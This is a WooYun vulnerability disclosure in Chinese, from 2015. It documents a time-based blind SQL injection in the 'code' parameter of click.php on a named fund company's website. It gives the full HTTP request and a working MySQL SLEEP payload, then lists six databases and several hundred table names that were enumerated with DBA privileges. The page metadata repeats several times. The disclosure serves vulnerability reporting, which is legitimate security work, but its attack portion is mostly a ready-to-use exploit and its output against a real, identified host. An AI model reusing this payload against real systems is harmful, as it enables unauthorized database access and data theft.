万银财富基金某站基于时间盲注第二弹(DBA权限6个库453个表)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110880

漏洞标题：万银财富基金某站基于时间盲注第二弹(DBA权限6个库453个表)

漏洞作者： YY-2012

提交时间：2015-04-28 17:15

修复时间：2015-06-12 17:16

公开时间：2015-06-12 17:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-28：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-06-12：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

POST /click.php HTTP/1.1
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://leshi.wy-fund.com:80/
Host: leshi.wy-fund.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
code=1&c_id=1&type=4

参数code过滤不严导致注入。

漏洞证明：

---
Parameter: code (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: code=1' AND (SELECT * FROM (SELECT(SLEEP(5)))RhBz) AND 'NMvd'='NMvd&c_id=1&type=4
---
back-end DBMS: MySQL 5
Database: caihui
[110 tables]
+----------------------------------------------+
| assetal                                      |
| avgrmmonf                                    |
| benchmark_comparison                         |
| bsheet                                       |
| bsheet_new                                   |
| bsholding                                    |
| cfip                                         |
| cfprofile                                    |
| cfunds_net_wy                                |
| cfunds_net_wy_3                              |
| chgrf                                        |
| chgrf_f                                      |
| cihdquote                                    |
| company_rating_wy                            |
| csholding                                    |
| csrcappfin                                   |
| curfscode                                    |
| curnav_der                                   |
| cxfundname                                   |
| dernav                                       |
| dhistory                                     |
| dhistory_dispara                             |
| dispara_fund                                 |
| downstate                                    |
| dsmeeting                                    |
| encurnav_der                                 |
| etfcrinfo                                    |
| etfcrstocks                                  |
| fcmg                                         |
| fcowner                                      |
| fcshare                                      |
| fegather                                     |
| fhdquote                                     |
| fholder                                      |
| fholder_chg                                  |
| finfo                                        |
| fparty                                       |
| fpchg                                        |
| fratios                                      |
| fshare                                       |
| fsmeeting                                    |
| fund_benchmark                               |
| fundbdy                                      |
| fundda                                       |
| fundiconvert                                 |
| fundmg                                       |
| fundsaiv                                     |
| fundshare_chg                                |
| fundsta                                      |
| fundtypes                                    |
| icst                                         |
| icst_new                                     |
| ifundos                                      |
| iport                                        |
| iport_s                                      |
| itprofile                                    |
| jjglr                                        |
| jjtgr                                        |
| jjtzbz                                       |
| jjxldy                                       |
| jjxljj                                       |
| lfshare                                      |
| mfdhispd                                     |
| mfdhistory                                   |
| nav                                          |
| nav_cur                                      |
| new_funds_index_wy                           |
| newsfin                                      |
| newstext                                     |
| ntrad                                        |
| ofip                                         |
| ofprofile                                    |
| prizestate                                   |
| profchg                                      |
| qdbhold                                      |
| qdfhold                                      |
| qdiport                                      |
| qdshold                                      |
| rating_wy                                    |
| risk_assessment_wy                           |
| scfp                                         |
| scfp_new                                     |
| securitycode                                 |
| sholding                                     |
| sholding_s                                   |
| sqlexecute                                   |
| symbol_comp                                  |
| tab_temp_kdj                                 |
| tab_temp_kdj_lh                              |
| temp_aa                                      |
| temp_bonus                                   |
| temp_company_stat                            |
| temp_fundtype_wy                             |
| temp_gr_year                                 |
| temp_info_new                                |
| temp_issue                                   |
| temp_main_fund                               |
| temp_manager_new                             |
| temp_manager_performance                     |
| temp_nav_cfund                               |
| temp_nav_curfund                             |
| temp_nav_ofund                               |
| temp_nav_strufund                            |
| temp_split                                   |
| temp_status                                  |
| tradedate                                    |
| tsmeeting                                    |
| tstat                                        |
| unicst_new                                   |
| uplog                                        |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: cqgd
[37 tables]
+----------------------------------------------+
| user                                         |
| admin_nav                                    |
| allocator                                    |
| allocator_copy                               |
| articles                                     |
| articles_cat                                 |
| attachment                                   |
| cate                                         |
| categroy                                     |
| click_log                                    |
| company                                      |
| configure                                    |
| customer                                     |
| dev_help                                     |
| diy_models                                   |
| filemanager                                  |
| fotor                                        |
| friend_link                                  |
| fund                                         |
| fund_flash                                   |
| fundindex_cat                                |
| gd_user                                      |
| index_fund                                   |
| info                                         |
| message_board                                |
| money                                        |
| permit                                       |
| permit_group                                 |
| plugins                                      |
| role_permit                                  |
| single_page                                  |
| sys_cfg                                      |
| tel                                          |
| tjb                                          |
| user_role                                    |
| users                                        |
| wylcb_fund                                   |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+
Database: caihui1
[228 tables]
+----------------------------------------------+
| finfo--                                      |
| itprofile-20140614                           |
| ofprofile-20140604                           |
| securitycode---                              |
| assetal                                      |
| assetal_copy                                 |
| assetal_copy1                                |
| avgrmmonf                                    |
| benchmark_comparison                         |
| bsheet                                       |
| bsheet_new                                   |
| bsholding                                    |
| cfip                                         |
| cfprofile                                    |
| cfunds_net_wy                                |
| chdquote                                     |
| chdquote_copy                                |
| chgrf                                        |
| chgrf_20141030                               |
| chgrf_f                                      |
| cihdquote                                    |
| cihdquote_copy                               |
| company_rating_wy                            |
| companycomm                                  |
| companycomm_bak                              |
| csholding                                    |
| csrcappfin                                   |
| curfscode                                    |
| curnav_der                                   |
| cxfundname                                   |
| dernav                                       |
| dhistory                                     |
| dhistory_dispara                             |
| dispara_fund                                 |
| downstate                                    |
| dsmeeting                                    |
| encurnav_der                                 |
| etfcrinfo                                    |
| etfcrstocks                                  |
| fcmg                                         |
| fcowner                                      |
| fcshare                                      |
| fegather                                     |
| fhdquote                                     |
| fholder                                      |
| fholder_chg                                  |
| finfo                                        |
| fparty                                       |
| fpchg                                        |
| fratios                                      |
| fshare                                       |
| fsmeeting                                    |
| fund_benchmark                               |
| fund_diagnose_record                         |
| fundbdy                                      |
| fundda                                       |
| fundiconvert                                 |
| fundmg                                       |
| fundsaiv                                     |
| fundshare_chg                                |
| fundsta                                      |
| fundtypes                                    |
| icst                                         |
| icst_new                                     |
| ifundos                                      |
| iport                                        |
| iport_s                                      |
| itnews                                       |
| itprofile                                    |
| jjglr                                        |
| jjjj                                         |
| jjtgr                                        |
| jjtzbz                                       |
| jjxldy                                       |
| jjxljj                                       |
| jjzx                                         |
| lfshare                                      |
| mfdhispd                                     |
| mfdhistory                                   |
| nav                                          |
| nav_cur                                      |
| new_funds_index_wy                           |
| new_funds_index_wy_1121                      |
| new_funds_index_wy_2                         |
| new_funds_index_wy_3                         |
| new_funds_index_wy_4                         |
| newsauth                                     |
| newsfin                                      |
| newsindus                                    |
| newstext                                     |
| newstype                                     |
| ntrad                                        |
| ofip                                         |
| ofprofile                                    |
| p_record                                     |
| prizestate                                   |
| profchg                                      |
| qdbhold                                      |
| qdfhold                                      |
| qdiport                                      |
| qdshold                                      |
| rating_wy                                    |
| risk_assessment_wy                           |
| scfp                                         |
| scfp_new                                     |
| scstc                                        |
| securitycode                                 |
| securitycode_copy                            |
| sholding                                     |
| sholding_s                                   |
| sqlexecute                                   |
| symbol_comp                                  |
| tab_comp_kdj                                 |
| tab_comp_logrecorder                         |
| tab_comp_ma                                  |
| tab_comp_ma_120                              |
| tab_comp_ma_120_bak                          |
| tab_comp_macd                                |
| tab_comp_rsi                                 |
| tab_comp_symbol                              |
| tab_comp_temp_kdj_lh                         |
| tab_comp_temp_lh                             |
| tab_comp_uplog                               |
| tab_dxfzbj                                   |
| tab_fixedinvestment                          |
| tab_gptj_chang                               |
| tab_gptj_duan                                |
| tab_gptj_mc                                  |
| tab_gptj_zhong                               |
| tab_invest_reinforcement                     |
| tab_invest_wave_band                         |
| tab_jmtj                                     |
| tab_jmtj_chang                               |
| tab_jmtj_duan                                |
| tab_jmtj_mc                                  |
| tab_jmtj_mc_copy                             |
| tab_jmtj_zhong                               |
| tab_new_jjld                                 |
| tab_new_jjyj                                 |
| tab_new_nxyj                                 |
| tab_pzx                                      |
| tab_recommendlog                             |
| tab_symbol_rank                              |
| tab_tg_flmc                                  |
| tab_tg_jjtj                                  |
| tab_tg_jjyj                                  |
| tab_tg_nxyj                                  |
| table07051                                   |
| table07052                                   |
| table07053                                   |
| table1                                       |
| table2                                       |
| table3                                       |
| tablehy07051                                 |
| tablehy07052                                 |
| tablehy07053                                 |
| tablehy1                                     |
| tablehy2                                     |
| tablehy3                                     |
| tablez07051                                  |
| tablez07052                                  |
| tablez07053                                  |
| tablez1                                      |
| tablez2                                      |
| tablez3                                      |
| temp_aa                                      |
| temp_asset                                   |
| temp_bb                                      |
| temp_bonus                                   |
| temp_bonus_jj                                |
| temp_buy_info                                |
| temp_company_stat                            |
| temp_fundtype_wy                             |
| temp_gr_last                                 |
| temp_gr_year                                 |
| temp_info_new                                |
| temp_info_new_jj                             |
| temp_issue                                   |
| temp_issue_jj                                |
| temp_main_fund                               |
| temp_manager_new                             |
| temp_manager_new_jj                          |
| temp_manager_performance                     |
| temp_manager_performance_jj                  |
| temp_nav_cfund                               |
| temp_nav_cfund_jj                            |
| temp_nav_curfund                             |
| temp_nav_curfund_jj                          |
| temp_nav_ofund                               |
| temp_nav_ofund_jj                            |
| temp_nav_strufund                            |
| temp_nav_strufund_jj                         |
| temp_split                                   |
| temp_split_jj                                |
| temp_status                                  |
| temp_status_jj                               |
| temp_stock_chg                               |
| temp_stock_chg_jj                            |
| temp_stock_chg_test                          |
| temp_stock_list                              |
| temp_stock_list_jj                           |
| tradedate                                    |
| tsmeeting                                    |
| tstat                                        |
| unicst_new                                   |
| uplog                                        |
| v9_symbols                                   |
| wy_tab_gp_mothlow                            |
| wy_tab_gp_quarter                            |
| wy_tab_gp_symbol                             |
| wy_tab_gp_week                               |
| wy_tab_gp_week_h                             |
| wycf_zq_howbuy_fbnav                         |
| wycf_zq_howbuy_kfnav                         |
| wycf_zq_howbuy_ph                            |
| wycf_zq_howbuy_ph_hb                         |
| wycf_zq_nav                                  |
| wycf_zq_sina_hbfund                          |
| wycf_zq_sina_ph                              |
| wycf_zq_temp_fhb                             |
| wycf_zq_temp_hb                              |
| wycf_zq_temp_nav_hbfund                      |
| wycf_zq_temp_nav_ofund                       |
| wycf_zq_temp_ph                              |
| wycf_zq_tt_ofund                             |
| wycf_zq_tt_ph_kf                             |
| wycf_zq_tttempzhishu                         |
| wycf_zq_zhishu                               |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110880

漏洞标题：万银财富基金某站基于时间盲注第二弹(DBA权限6个库453个表)

相关厂商：万银财富

漏洞作者： YY-2012

提交时间：2015-04-28 17:15

修复时间：2015-06-12 17:16

公开时间：2015-06-12 17:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110880

漏洞标题：万银财富基金某站基于时间盲注第二弹(DBA权限6个库453个表)

相关厂商：万银财富

漏洞作者： YY-2012

提交时间：2015-04-28 17:15

修复时间：2015-06-12 17:16

公开时间：2015-06-12 17:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0110880"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：